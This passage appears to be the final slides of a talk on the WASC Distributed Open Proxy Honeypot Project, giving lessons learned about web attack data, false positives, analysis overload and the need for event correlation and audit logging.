Application defects (server misconfigurations, cookie weaknesses, error messages) are a significant problem area.
False positives were high in some classes of attacks; however, that was mainly due to the open proxy deployment and would not manifest itself in normal production environments.

Lessons Learned (2)
As good as the identification/protection rules were, we still had analysis challenges due to data overload. We need better/automated ways to categorize attacks.
Even so, some activities are difficult to identify by looking at just one transaction. We need better correlation capabilities to identify anomalies and trends over time.
Correlation of event data and full audit logging for forensics is essential.

If you would like to participate in the WASC Distributed Open Proxy Honeypot Project, please visit the website for more information: http://www.webappsec.org/projects/honeypots/

Questions?
